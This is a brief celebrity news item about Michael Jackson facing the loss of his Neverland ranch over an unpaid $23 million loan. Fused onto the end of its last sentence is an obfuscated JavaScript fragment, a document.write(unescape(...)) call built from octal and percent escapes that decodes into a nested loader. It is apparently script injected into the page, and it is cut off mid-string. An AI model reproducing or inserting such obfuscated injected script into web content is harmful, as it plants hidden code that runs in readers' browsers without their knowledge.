Pop icon Michael Jackson will lose his Neverland ranch in January if he fails to pay a $23 million loan, it has been claimed.
The superstar may see his fairytale home being sold a final demand on the huge debt.
Investment company the Fortress Trust are understood to have issued the ultimatum, which expires on January 19.
Although Jackson is said to be nearing agreement with Sony ATV Music Publishing about a financial deal, this is not thought to involve Neverland.
According to reports, he is currently residing in a rented property in Washington and would essentially be homeless if his fairytale former home was auctioned off.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
